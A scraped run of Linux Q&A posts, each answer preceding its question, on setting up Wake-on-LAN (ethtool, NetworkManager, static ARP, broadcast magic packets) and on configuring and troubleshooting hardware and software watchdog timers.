+-1a.1 Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #5
+-1a.2 Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #6
+-1a.7 Intel Corporation 82801JI (ICH10 Family) USB2 EHCI Controller #2
+-1b.0 Intel Corporation 82801JI (ICH10 Family) HD Audio Controller
+-1c.0-[06]--
+-1c.2-[05]----00.0 Marvell Technology Group Ltd. 88E8056 PCI-E Gigabit Ethernet Controller
+-1c.5-[04]----00.0 Marvell Technology Group Ltd. 88E8056 PCI-E Gigabit Ethernet Controller
+-1d.0 Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #1
+-1d.1 Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #2
+-1d.2 Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #3
+-1d.7 Intel Corporation 82801JI (ICH10 Family) USB2 EHCI Controller #1
+-1e.0-[07]----02.0 VIA Technologies, Inc. VT6306/7/8 [Fire II(M)] IEEE 1394 OHCI Controller
+-1f.0 Intel Corporation 82801JIR (ICH10R) LPC Interface Controller
+-1f.2 Intel Corporation 82801JI (ICH10 Family) 4 port SATA IDE Controller #1
+-1f.3 Intel Corporation 82801JI (ICH10 Family) SMBus Controller
\-1f.5 Intel Corporation 82801JI (ICH10 Family) 2 port SATA IDE Controller #2The device with a LAN connection is enp5s0 according to the respone of calling ip addr. Which I assumed is this one from lspci -tv: +-1c.2-[05]----00.0 Marvell Technology Group Ltd. 88E8056 PCI-E Gigabit Ethernet Controller.
Executing cat /proc/acpi/wakeup gave me:
Device S-state Status Sysfs node
NPE2 S4 *disabled
NPE4 S4 *disabled
NPE5 S4 *disabled
NPE6 S4 *disabled
NPE8 S4 *disabled
NPE9 S4 *disabled
NPEA S4 *disabled
P0P1 S4 *disabled pci:0000:00:1e.0
PS2K S4 *disabled
PS2M S4 *disabled
USB0 S4 *enabled pci:0000:00:1d.0
USB1 S4 *enabled pci:0000:00:1d.1
USB2 S4 *enabled pci:0000:00:1d.2
USB5 S4 *disabled
EUSB S4 *enabled pci:0000:00:1d.7
USB3 S4 *enabled pci:0000:00:1a.0
USB4 S4 *enabled pci:0000:00:1a.1
USB6 S4 *enabled pci:0000:00:1a.2
USBE S4 *enabled pci:0000:00:1a.7
P0P4 S4 *disabled pci:0000:00:1c.0
P0P5 S4 *disabled
P0P6 S4 *disabled pci:0000:00:1c.2
P0P7 S4 *disabled
P0P8 S4 *disabled
P0P9 S4 *disabled pci:0000:00:1c.5
NPE1 S4 *disabled pci:0000:00:01.0
NPE3 S4 *disabled pci:0000:00:03.0
NPE7 S4 *disabled pci:0000:00:07.0
GBE S4 *disabledSince the Sysfs node matches that what I got from lspci -tv for device POP6, I assumed I had to enable POP6 to enable my Ethernet card.
|
How can I boot my desktop using Wake-on-LAN?
|
I found the problem: I had to use wakeonlan with the -i=<ip> option (with ip of course replaced with the ip of the system).
|
Following these instructions, I found that phy0 on my desktop should support wake on wlan and turned it on.
[root@Arch alex]# iw phy0 wowlan show
WoWLAN is enabled:
* wake up on magic packetHowever, when I suspend the system and try to wake it up from a distance, it doesn't work:
[alex@Archlaptop tmp]$ wol 44:E5:17:ED:9E:D2r
Waking up 44:E5:17:ED:9E:D2r...And nothing happens. Furhermore, if I follow the Arch wiki, I don't get wake-on-wlan:
[root@Arch alex]# ethtool wlo1
Settings for wlo1:
Link detected: yesWhat is going on?
|
Wake on wlan should work but doesn't
|
Ok, silly me did not think about the fact, that Windows and Linux per default have an ARP timeout of exactly 30 seconds as one can see by doing a
netsh interface ipv4 show interface 2in cmd.exe, where the 2 has to be replaced with the Idx of your NIC, one gets by issuing
netsh interface ipv4 show interfacesOn Linux type
cat /proc/sys/net/ipv4/neigh/default/base_reachable_time_msin your bash, to see the default ARP timeout in milliseconds.
So the solution would be to set a static ARP address in order to wake a system through SSH or SMB or whatever. To do this do a
arp -s 10.0.0.200 00-10-54-CA-E1-40on Windows and a
arp -s 10.0.0.200 00:10:54:CA:E1:40on your Linux system.
|
I'm having some trouble with Wake on LAN through PHY and unicast. I'm able to wake the system by pinging or sshing the shut down machine, but only within the first ~30 seconds. Why's that, what could be the cause?
I put a script 70wol into /usr/lib/pm-utils/sleep.d and made it executable, it obviously is executed since it works:
#!/bin/bash
ethtool -s eth0 wol pugI'm on Debian Testing, NIC is Intel I217-V on an Intel DH87RL, Driver is Intel 2.5.4 e1000e.ko
|
Wake on LAN through PHY and unicast only works in the first ~30 seconds after pm-suspend
|
systemctl enable sshd.service
This will set ssh to automatically start.
|
I'm having an issue with ssh. My idea was to set up Wake on Lan on my pc, which runs Kali Linux Rolling (2008.1), and using ssh to connect to it after it booted.
Everything works fine, except for the fact that after the pc is booted I can't connect to ssh. To do that, I need to log on from my pc, start ssh and then connect remotely.
Obviously the problem is that the ssh service stops itself after powering off the pc and it doesn't start automatically once the pc is booted. Is there a way to solve this problem? I mean, there must be.
|
How to start sshd automatically [closed]
|
Wake-On-LAN is a hardware feature: it's not intended to reach the main interface participating in routing: the bridge, but always the physical interface: the actual NIC interface set as bridge port. The usual method used for Wake-On-LAN is to use the Magic Packet (original 1995 AMD white paper: PDF), rather than other methods (such as unicast, broadcast or ARP) to avoid spurious unwanted wake ups.
Normally, Wake-On-LAN can be enabled using ethtool (eg: on eth0) with:
ethtool --change eth0 wol ggiving:
# ethtool eth0 | grep -i wake
Supports Wake-on: pumbg
Wake-on: gBut actually, NetworkManager, if not told otherwise, will probably disable again Wake-On-LAN on the interface it manages either before or after a suspend making it fail either the first time, or the 2nd time (and after reboots). So this is not enough. NetworkManager has to be told to use Wake-On-LAN on this interface.
nmcli commands below could be done using the GUI applet instead if a GUI is available.
If for example NetworkManager has these connection names: Bridge connection 1 and as slave interface Ethernet connection 1, the feature has to be activated on Ethernet connection 1.
# nmcli connection show id 'Ethernet connection 1' | grep -i wake
802-3-ethernet.wake-on-lan: default
802-3-ethernet.wake-on-lan-password: --which is documented in nm-settings-nmcli(5):802-3-ethernet.wake-on-lan
The NMSettingWiredWakeOnLan options to enable. Not all devices support
all options. May be any combination of "phy" (0x2), "unicast" (0x4),
"multicast" (0x8), "broadcast" (0x10), "arp" (0x20), "magic" (0x40) or
the special values "default" (0x1) (to use global settings) and
"ignore" (0x8000) (to disable management of Wake-on-LAN in
NetworkManager).While there might be a default somewhere else, setting it explicitly to magic will make sure Wake-On-LAN stays enabled on this interface.
Set it to magic like this:
nmcli connection modify 'Ethernet connection 1' 802-3-ethernet.wake-on-lan magicBecause this setting might not be applied immediately by NetworkManager (even including after nmcli connection reload) it should also be set manually, just once after having configured this, as described above (change the interface name as needed):
ethtool --change eth0 wol gNow about usage. There is no reason the bridge's Ethernet MAC address will be the same as the NIC's Ethernet MAC address. This is even explicitly not the default in modern systemd systems (though NetworkManager itself might choose to copy it to the bridge). So ARP even if it's still in the cache of a system in the same LAN will never be the correct method to have a Magic Packet reach the physical interface. When suspended one can't rely the physical interface to be kept in promiscuous mode (because it's a bridge port) anymore. Anyway such ARP would also fail if the cache entry is evicted from that system's cache.
If using IP as payload mechanism, just always use a destination that will resolve into a MAC Ethernet broadcast destination (FF:FF:FF:FF:FF:FF) and not attempt an ARP resolution: either the LAN broadcast 255.255.255.255 or the directed broadcast (eg in LAN 192.168.1.0/24 that would be 192.168.1.255).
For example, if the NIC's MAC address is 12:34:56:78:9a:bc, using wakeonlan, just do, from the same LAN:
wakeonlan 12:34:56:78:9a:bcor if the system has access to multiple LANs, eg 192.0.2.0/24 and 192.168.1.0/24 and the system to wake is in the latter:
wakeonlan -i 192.168.1.255 12:34:56:78:9a:bcOther tools may have or lack other features. Eg: etherwake requires instead to specify an interface and won't use IP but Ethernet type 0x0842 which is a de facto type reserved for Wake-On-LAN (but doesn't have to be used), and requires root or adequate capabilities to be used:
etherwake -i eth0 12:34:56:78:9a:bcThis is outside the scope of the question but to give pointers, wake from remote over internet requires help from the Internet gateway: it has to run custom software, or to do NAT to a broadcast and enable routing directed broadcasts which is always disabled by default for security reasons. As described above, setting a permanent ARP address usually doesn't help with a bridge, but it could be a fake permanent ARP address for the purpose of waking the system, by reserving a fictive IP address (not used anywhere, including not present on the bridge interface) in the LAN for such purpose.
|
I have been trying to set up an environment for my hypervisor, which is just a Debian Bookworm running qemu.
I have been using the web interface Cockpit to help me see things when the terminal is too arid. But in doing so, I had to switch from using systemd-nerworkd to NetworkManager.
Recently, I learned how to create a bridge network so my VMs and the host can communicate with each other. But after doing that my wakeonlan stopped working. I understand that this is expected because the router now 'sees' the MAC address of the bridge instead of the one from the nic.
From what I understand, wakeonlan works at the MAC level of the networking model. I tried using arping from other clients in the network and they cannot "see" the MAC address of my hypervisor (bridge).
Now I'm starting to think it might not even be possible to have a bridge at the same time as wakeonlan. Is this possible? If so, how can I do it? preferably using NetworkManager.
|
Wake On Lan using a nic attached to a NetworkManager bridge interface
|
Solved it by moving the server in question to a dedicated VLAN and then logging the traffic between it and the rest of the network by using specific iptable rules triggered on some ports.
I will have a full writeup on my site when i finish the project and will update this answer then.
|
So i've seen the WOL scripts and they seem like they could work well when i'm trying to connect from a computer that is outside my router.
Script i'm using:
http://www.dd-wrt.com/wiki/index.php/Useful_Scripts#Web_Server_Wake-up
Now the problem that i see is that when ever i'm home the WOL script will be useless because the initiating computer and the server are on the same subnet so the router will not log the request.
Is there a way to have the router log the requests that are sent between two computers inside its network? I'm not very knowledgeable when it comes to network structure but i don't know if this is possible. Do i need to somehow proxy all my traffic through my router?
For explanation here is what i'm trying to do:
I have my home server that serves up SMB, AFP, HTTP(s), and a few other web applications. I would like the server to be sleeping when its not being accessed period. So if something outside the network requests HTTP access i want the server to wake up. If a computer on the local subnet requests a SMB share i want the server to wake up.
Things to note:
I have an Ubuntu server.
All machines that are on the local network are directly connected to the router. I have one hub that some machines are connected to but all traffic should be going through the router.
EDIT: Just had a thought. What if i put the server in question on a separate VLAN and allowed for communication between the VLAN through the router. Then the traffic would have to go through the firewall and i could log the traffic there. Would anyone know how to set up such a system?
|
Use DD-WRT to auto WOL when traffic is on same subnet
|
Simple Answer
I think you're going about this the wrong way. The simple way to achieve this is that you don't need to assign it an IP address. Send the WOL packet to your LAN's broadcast address. This is almost always the last address in the subnet. So if your LAN is on 192.168.1.x with subnet mask 255.255.255.0 the broadcast address will be 192.168.1.255.
This will be sent to ALL machines on the LAN (all machines on the same subnet at least). This won't matter! The WOL "magic packet" must contain the MAC address of the machine you want to wake up. So every other machine on your network will receive the packet and ignore it.Complex Answer
On an Ethernet LAN packets are always sent to hardware (MAC) addresses not IP addresses. When machine A 192.168.1.2 tries to send a message to machine B 192.168.1.3 it uses ARP to find the mac address associated with 192.168.1.3 and then send the message to that mac address.
Normally ARP works by A broadcasting "who is 192.168.1.3" and machine B responding "it's me". But with machine B switched off, machine B cannot respond and doesn't even know it's own IP address. So ARP cannot work with machine B switched off.
Fortunately Linux will let you statically set the MAC address associated with an IP address and bypass ARP all together. In your case you would do that on your r-pi custom router:
sudo arp -s <ip address> <PC's mac address>Eg:
sudo arp -s 192.168.1.3 00:0a:29:10:24:afNow your router (and only your router) knows how to talk to 192.168.1.3 without it being switched on. As long as WOL has been setup on that machine and it is plugged in correctly you can address the WOL packet to the PCs IP address.
For this to work you do need to be sure that 192.168.1.3 will never be used by another machine. It's helpful to make sure that your PC always has this IP address, or things will get very confusing.Question1: How can I assign IP address to eth1 when the device connecting eth1 turns off?Use sudo arp -s <ip address> <mac address> on the machine that wants to talk to it.Question2: Should I create virtual bridge to achieve this?No
|
I want to use wake on lan via my custom router. Below image is my networking image. I could make connection from smart phone to raspi3 using google cloud platform and VPN (softether), and from raspi3 to Desktop PC when the Desktop PC turns on.
However, when the Desktop PC turns off, eth1 is not assigned IP address. So I couldn't use wake on lan (couldn't send magic packet to Desktop PC with Python). Here is ifconfig output;
sudo ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.16.0.20 netmask 255.255.254.0 broadcast 172.16.1.255
inet6 fe80::51dd:e5ef:c061:adb9 prefixlen 64 scopeid 0x20<link>
ether b8:27:eb:df:31:9c txqueuelen 1000 (Ethernet)
RX packets 158 bytes 26655 (26.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 168 bytes 42199 (41.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0eth1: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 04:ab:18:3b:af:e2 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 4 bytes 240 (240.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4 bytes 240 (240.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0vpn_vpn_nic: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.20 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80::ebcc:65ba:a7f4:a21e prefixlen 64 scopeid 0x20<link>
inet6 fe80::5cab:14ff:fe17:ae3a prefixlen 64 scopeid 0x20<link>
ether 5e:ab:14:17:ae:3a txqueuelen 1000 (Ethernet)
RX packets 2 bytes 122 (122.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 34 bytes 5198 (5.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0wlan0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether b8:27:eb:8a:64:c9 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Question1: How can I assign IP address to eth1 when the device connecting eth1 turns off?
Question2: Should I create virtual bridge to achieve this?UPDATE1:
I tried Philip's answer such like
sudo arp -s 192.168.1.19 **:**:**:**:**:**, however, output was
SIOCADDRT: Network is unreachableNo established network caused this? Should I create 192.168.1.0?
↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑
After I added
ip route add 192.168.1.0/24 dev eth1in /etc/dhcpcd.exit-hook, I could pass sudo arp -s 192.168.1.19 **:**:**:**:**:**. But PC is still sleeping now... :(
|
Wake on lan via my custom router
|
The watchdog did not stop! line is normal behavior. systemd sets a "hardware watchdog" timer as a failsafe, to ensure that if the normal shutdown process freezes/fails that the computer will still shutdown after the specified period of time. This time period is defined in the variable ShutdownWatchdogSec= in the file /etc/systemd/system.conf. Here is the description from the docs:RuntimeWatchdogSec=, ShutdownWatchdogSec=
Configure the hardware watchdog at runtime and at reboot. Takes a timeout value in seconds (or in other time units if suffixed with
"ms", "min", "h", "d", "w"). If RuntimeWatchdogSec= is set to a
non-zero value, the watchdog hardware (/dev/watchdog) will be
programmed to automatically reboot the system if it is not contacted
within the specified timeout interval. The system manager will ensure
to contact it at least once in half the specified timeout interval.
This feature requires a hardware watchdog device to be present, as it
is commonly the case in embedded and server systems. Not all hardware
watchdogs allow configuration of the reboot timeout, in which case the
closest available timeout is picked. ShutdownWatchdogSec= may be used
to configure the hardware watchdog when the system is asked to reboot.
It works as a safety net to ensure that the reboot takes place even if
a clean reboot attempt times out. By default RuntimeWatchdogSec=
defaults to 0 (off), and ShutdownWatchdogSec= to 10min. These settings
have no effect if a hardware watchdog is not available.It sounds likely, as you indicated, that your actual problem is related to changing ACPI settings. The answers on this Debian forum thread suggest the following:1) Edit the file at /etc/default/grub and edit the
GRUB_CMDLINE_LINUX line to look like this:
GRUB_CMDLINE_LINUX="reboot=bios"
2) run: update-grubIf reboot=bios doesn't work, they suggest retrying with reboot=acpi
Do either of these work for you?
|
At shutdown I often get the message
watchdog did not stop!and then the laptop freezes after few other lines without shutting down.
Any idea on how to fix this? Recently it happened very often, usually when the laptop was powered on for some time.
I am using Debian 8 on an Asus UX32LA
I found this systemd file (it shows a conflict with the shutdown.target), if it may help. My impression is that the problem depends on some issue coming from me trying to fix the backlight (which actually only works with the grub paramenter "acpi_osi=" )
[Unit]
Description=Load/Save Screen Backlight Brightness of %i
Documentation=man:[emailprotected](8)
DefaultDependencies=no
RequiresMountsFor=/var/lib/systemd/backlight
Conflicts=shutdown.target
After=systemd-readahead-collect.service systemd-readahead-replay.service systemd-remount-fs.service
Before=sysinit.target shutdown.target[Service]
Type=oneshot
RemainAfterExit=yes
ExecStart=/lib/systemd/systemd-backlight load %i
ExecStop=/lib/systemd/systemd-backlight save %i
|
message at shutdown: watchdog did not stop!
|
Most modern PC hardware includes watchdog timer facilities. You can read more about them here via wikipedia: Watchdog Timers. Also from the Linux kernel docs:
excerpt - https://www.kernel.org/doc/Documentation/watchdog/watchdog-api.txtA Watchdog Timer (WDT) is a hardware circuit that can reset the
computer system in case of a software fault. You probably knew that
already.
Usually a userspace daemon will notify the kernel watchdog driver via
the /dev/watchdog special device file that userspace is still alive,
at regular intervals. When such a notification occurs, the driver
will usually tell the hardware watchdog that everything is in order,
and that the watchdog should wait for yet another little while to
reset the system. If userspace fails (RAM error, kernel bug,
whatever), the notifications cease to occur, and the hardware watchdog
will reset the system (causing a reboot) after the timeout occurs.
The Linux watchdog API is a rather ad-hoc construction and different
drivers implement different, and sometimes incompatible, parts of it.
This file is an attempt to document the existing usage and allow
future driver writers to use it as a reference.This SO Q&A titled, Who is refreshing hardware watchdog in Linux?, covers the linkage between the Linux kernel and the hardware watchdog timer.
What about the watchdog package?
The description in the RPM makes this pretty clear, IMO. The watchdog daemon can either act as a software watchdog or can interact with the hardware implementation.
excerpt from RPM descriptionThe watchdog program can be used as a powerful software watchdog
daemon or may be alternately used with a hardware watchdog device such
as the IPMI hardware watchdog driver interface to a resident Baseboard
Management Controller (BMC). watchdog periodically writes to
/dev/watchdog; the interval between writes to /dev/watchdog is
configurable through settings in the watchdog sysconfig file.
This configuration file is also used to set the watchdog to be used as
a hardware watchdog instead of its default software watchdog
operation. In either case, if the device is open but not written to
within the configured time period, the watchdog timer expiration will
trigger a machine reboot. When operating as a software watchdog, the
ability to reboot will depend on the state of the machine and
interrupts.
When operating as a hardware watchdog, the machine will experience a
hard reset (or whatever action was configured to be taken upon
watchdog timer expiration) initiated by the BMC.
|
Quite often times when I do a reboot, I get the following error message:
kernel: watchdog watchdog0: watchdog did not stop!I tried to find out more about watchdog by doing man watchdog, but it says no manual entry. I tried yum list watchdog and found that it was not installed. However, when I look at the /dev directory, I actually found two watchdogs:
watchdog and watchdog0
I am curious. Do I actually own any watchdogs? Why does the kernel complain that it did not stop when I do a reboot?
|
Do I own a watchdog?
|
Q3: What do the results of grep -i nmi /proc/interrupts mean?
It becomes clearer if you see the headings of the columns:
$ cat /proc/interrupts
CPU0 CPU1 CPU2 CPU3
NMI: 24 18 21 18 Non-maskable interruptsThis command displays statistics about the interrupts per CPU.
Q2: What's the advantage of disabling nmi_watchdog?
The nmi_watchdog can, under some circumstances, generate a high number of NMI interrupts (i.e. when using local APIC and you have high system load). A high number of interrupts may slow down your system.
Q1: What could happen if I disable nmi_watchdog permanently?
Imagine your system locks up. There's 2 possibilities now:
1) You have a hardware NMI button (some servers do). Push it, then the kernel (if properly configured) dumps a trace to console and reboots.
2) Your kernel reaches a halting state that can't be interrupted by any other method. In this case, the watchdog can reboot the machine.
|
Why we need to keep the nmi_watchdog enabled and what could happen if I disable it permanently ?
As some applications recommends to disable NMI watchdog to work properly, what's the advantage of disabling it ?
And what does the results of this command, grep -i nmi /proc/interrupts mean ?
NMI: 24 18 21 18 Non-maskable interrupts
|
Should I disable NMI watchdog permanently or not?
|
Open
/lib/systemd/system/watchdog.serviceand add
[Install]
WantedBy=multi-user.targetSystemd needs the [Install]-Section for a Unit to know how it should enable/disable the Unit.
|
I'm using a Raspberry Pi B, with Raspbian.
After upgrading to Jessie, watchdog daemon doesn't start at boot anymore. Starting it manually using "sudo service watchdog start" does work.
I tried:purging and reinstalling watchdog
update-rc.d watchdog defaults && update-rc.d watchdog enable
systemctl enable watchdog produces this error: The unit files have no [Install] section. They are not meant to be enabled using systemctl.I checkedsyslog with systemd verbosity on debug, no results. Other than the watchdog device nothing is mentioned.
systemctl list-units | grep -i watchdog is emtpy (unless I started it manually)
My default runlevel is 5 and the priority of watchdog in /etc/rc5.d/ is also 5.What else can I try?
|
Watchdog daemon doesn't start at boot
|
If you have a watchdog on your system and a driver that uses /dev/watchdog, all you have to do is kill the process that is feeding it; if there is no such process, then you can touch /dev/watchdog once to turn it on, and if you don't touch it again, it will reset.
You also might be interested in resetting the device using the "magic sysrq" way. If you have a kernel with the CONFIG_MAGIC_SYSRQ feature compiled in, then you can echo 1 > /proc/sys/kernel/sysrq to enable it, then echo b > /proc/sysrq-trigger to reboot. When you do this, it reboots immediately, without unmounting or or syncing filesystems.
|
Is there a command like
vi > out
vi | outThat I could use to cause a watchdog reset of my embedded linux device?
|
How do I cause a watchdog reset of my embedded Linux device
|
There are two types of watchdog; hardware and software. On the Orange Pi the SOC chip provides a hardware watchdog. If initialised then it needs to be pinged every so often, otherwise it performs a board reset.
However not many desktops have hardware watchdogs, so the kernel provides a software version. Now the kernel will try and keep track, and force a reboot. This isn't as good as a hardware watchdog because if the kernel, itself, breaks then nothing will trigger the reset. But it works.
The software watchdog can be initialised by loading the softdog module
% modprobe softdog
% dmesg | tail -1
[ 120.573945] softdog: Software Watchdog Timer: 0.08 initialized. soft_noboot=0 soft_margin=60 sec soft_panic=0 (nowayout=0)We can see this has a 60 second timeout by default.
If I then do
% echo > /dev/watchdog
% dmesg | tail -1
[ 154.514976] watchdog: watchdog0: watchdog did not stop!We can see the watchdog hadn't timed out.
I then leave the machine idle for a minute and on the console I see
[ 214.624112] softdog: Initiating system rebootand the OS reboots.
|
On an Orange Pi Zero running a Raspbian server, it's possible to use the watchdog very easily just by running the command echo 1 > /dev/watchdog as root. The idea is that the system will certainly reboot after some time that this command is executed, so I need to keep repeating this command in a regular interval of time to keep the system on. We can implement a watchdog using cron as root and making it execute the following script on boot:
#!/bin/bash
while [ true ]; do
echo 1 > /dev/watchdog
sleep 5
doneThis script works fine on the Orange Pi Zero... However, on my desktop computer running Ubuntu 18.04 the command echo 1 > /dev/watchdog doesn't work at all. Is it possible to activate the watchdog on any device running Linux?
|
Is it possible to activate the watchdog on any Linux machine?
|
1. Load hardware module
Firstly, in order to actually 'feed' the watchdog, you need to have the watchdog hardware module loaded. This may not happen automatically as most watchdog drivers are blacklisted in case there is no watchdog daemon (e.g. in /etc/modprobe.d/blacklist-watchdog.conf on an Ubuntu/Debian system). Check to see if /dev/watchdog (or similar) has appeared, as that would imply the module has been loaded.
I don't know what the Supermicro board uses, but it may be the Intel TCO driver (iTCO_wdt). Note that iTCO_wdt might require some other modules like i2c-i801, i2c-smbus to do its magic. Try using modprobe iTCO_wdt to load that module and see if it is accepted.
Success looks like:
iTCO_wdt: Found a Intel PCH TCO device (Version=4, TCOBASE=0x0400)
iTCO_wdt: initialized. heartbeat=120 sec (nowayout=0)Failure shows nothing after:
iTCO_wdt: Intel TCO WatchDog Timer Driver v1.11 Also check syslog. Otherwise check out the IPMI tools as they include a watchdog driver.
2. Edit /etc/watchdog.conf
Secondly, you need to edit the watchdog configuration file, like # nano /etc/watchdog.conf.
3. Un-comment watchdog-device = ...
So actually use the /dev/watchdog device access to the module. Otherwise the watchdog will not use the hardware and rely only on its internal code to soft-reboot a broken machine (which is not so useful).
Again, on starting the watchdog daemon look for messages in syslog about it starting and what hardware module it has found.
|
Supermicro main boards contain a BIOS feature named "Watch Dog Function". Having Debian 6.0.6 with kernel "Linux debian 2.6.32-5-amd64 #1 SMP" we did:Change BIOS "Watch Dog Function" from Disabled to Enabled.
Install the package watchdog (# apt-get install watchdog)Expected: that would be all for the watchdog function to be correctly installed.
Result: system reboots every (roughly) 5 minutes.
Change BIOS "Watch Dog Function" from Enabled to Disabled fixes the undesired reboots.
The boot process seems to correctly enable the watchdog daemon. At least console displays (when BIOS Watch Dog is disabled):
Starting watchdog keepalive daemon: wd_keepalive.
Stopping watchdog keepalive daemon....
Starting watchdog daemon....And on reboot this output is generated:
INIT: SUsing makefile-style concurrent boot in runlevel 6.
Stopping watchdog daemon....
Starting watchdog keepalive daemon....What else need to be done to configure the BIOS watch dog function and Linux OS watchdog daemon to work together correctly?
|
How to correctly configure Debian watchdog daemon for BIOS Watch Dog?
|
Having a watchdog on an embedded system will dramatically improve the availability of the device. Instead of waiting for the user to see that the device is frozen or broken, it will reset if the software fails to update at some interval. Some examples:Linux System http://linux.die.net/man/8/watchdog
VxWorks (RTOS) http://fixunix.com/vxworks/48664-about-vxworks-watchdog.html
QNX Watchdog http://www.qnx.com/solutions/industries/netcom/ha.htmlThe device is designed in such a way that its state is saved somewhere periodically(like Juniper routers that run FreeBSD, Android phones, and dvrs that run linux). So even if it is rebooted it should re-enter a working configuration.
|
After reading this question, I was a little confused; it sounds like some daemon reacting by rebooting a system. Is that right? Is it a common occurrence in embedded *nixes?
|
What is a "watchdog reset"?
|
Yes, per the same manual page:TEST BINARY
If the return code of the check binary is not zero watchdog will assume
an error and reboot the system. A positive exit code is interpreted as
a system error code (see errno.h for details).so in this particular case (error 101), according to errno.h:
ENETUNREACH 101 /* Network is unreachable */
|
Here's a line from a linux syslog:
watchdog[2423]: shutting down the system because of error 101However, after searching online and in man watchdog, I cannot find any discussion or explanation of the error codes. Is there any such thing?
|
Error codes for watchdog daemon
|
while true; do
echo "0"
sleep 30
done > /dev/watchdog
|
The hardware watchdog on my system needs a 0 written to /dev/watchdog at less than 60 seconds interval or it will fire. The file handle must be kept open however or the watchdog is then disabled.
E.g.
echo "0" > /dev/watchdogdoes not work, as the file handle is closed after the echo is completed.
Is there any way to setup a loop in bash that will write 0 periodically to /dev/watchdog but keep the file handle open?
|
Any way in Bash to write to a file every X seconds without closing it?
|
This is returning 203. That's usually a systemd message.
Exit codes 200 and above are used by systemd's service manager to indicate problems during process invocation.
See man systemd.exec for details.
203 specifically means:The actual process execution failed (specifically, the execve(2) system call). Most likely this is caused by a missing or non-accessible executable file.Check that /usr/bin/npm actually exists and has write permissions. Also check that you can run /usr/bin/npm yourself.
I usually see this problem from people who run manual installations (installing to other locations such as /usr/local/bin or not installing some dependencies). Installing nodejs from your package manager is usually your easiest route to a working npm.
|
My systemctl Code dont work
● <appname>.service
Loaded: loaded (/etc/systemd/system/<appname>.service; disabled; vendor prese
Active: failed (Result: exit-code) since Mon 2022-04-04 21:55:20 CEST; 4s ago
Process: 1686 ExecStart=/usr/bin/npm start (code=exited, status=203/EXEC)
Main PID: 1686 (code=exited, status=203/EXEC)Apr 04 21:55:20 raspberrypi systemd[1]: <appname>.service: Service RestartSec=50
Apr 04 21:55:20 raspberrypi systemd[1]: <appname>.service: Scheduled restart job
Apr 04 21:55:20 raspberrypi systemd[1]: Stopped <appname>.service.
Apr 04 21:55:20 raspberrypi systemd[1]: <appname>.service: Start request repeate
Apr 04 21:55:20 raspberrypi systemd[1]: <appname>.service: Failed with result 'e
Apr 04 21:55:20 raspberrypi systemd[1]: Failed to start <Appname>.service.systemctl reset-failed <appname>
systemctl start <appname>^^Dont work
Can anyone help?
|
Systemctl service failed Exit-code
|
The reason watchdog daemon was not able to reset the hardware watchdog timer on Supermicro X9DR3-F motherboard is that the watchdog functionality in UEFI controls the third watchdog. This is on Winbond Super I/O 83527 chip. In other words, iTCO_wdt and ipmi_watchdog drivers were wrong drivers for that watchdog chip.
|
I have a Supermicro X9DR3-F motherboard where JWD jumper pins 1 and 2 are shorted and watchdog functionality in UEFI is enabled:This means that the system is reset after around 5 minutes if nothing resets the hardware watchdog timer. I installed the watchdog daemon and configured it to use iTCO_wdt driver:
$ cat /etc/default/watchdog
# Start watchdog at boot time? 0 or 1
run_watchdog=1
# Start wd_keepalive after stopping watchdog? 0 or 1
run_wd_keepalive=1
# Load module before starting watchdog
watchdog_module="iTCO_wdt"
# Specify additional watchdog options here (see manpage).
$ When the watchdog daemon is started, then the driver is loaded without issues:
$ sudo dmesg | grep iTCO_wdt
[ 17.435620] iTCO_wdt: Intel TCO WatchDog Timer Driver v1.11
[ 17.435667] iTCO_wdt: Found a Patsburg TCO device (Version=2, TCOBASE=0x0460)
[ 17.435761] iTCO_wdt: initialized. heartbeat=30 sec (nowayout=0)
$ Also, the /dev/watchdog file is present:
$ ls -l /dev/watchdog
crw------- 1 root root 10, 130 Dec 8 22:36 /dev/watchdog
$ watchdog-device option in watchdog daemon configuration points to this file:
$ grep -v ^# /etc/watchdog.conf watchdog-device = /dev/watchdog
watchdog-timeout = 60interval = 5
log-dir = /var/log/watchdog
verbose = yes
realtime = yes
priority = 1heartbeat-file = /var/log/watchdog/heartbeat
heartbeat-stamps = 1000
$ In order to debug the writes to the watchdog device I have enabled heartbeat-file option and looks that the keepalive messages to /dev/watchdog are sent:
$ tail /var/log/watchdog/heartbeat
1575830728
1575830728
1575830728
1575830733
1575830733
1575830733
1575830733
1575830733
1575830733
1575830733
$ However, despite this the server resets itself with roughly five minute intervals.
My next thought was that maybe the iTCO_wdt driver controls the watchdog in C606 chipset and the watchdog resetting the server is instead part of IPMI. So I made sure that the iTCO_wdt driver is not loaded during the boot and rebooted the server. Fair enough, the /dev/watchdog was no longer present. Now I loaded the ipmi_watchdog module:
$ ls -l /dev/watchdog
ls: cannot access '/dev/watchdog': No such file or directory
$ sudo modprobe ipmi_watchdog
$ sudo dmesg -T | tail -1
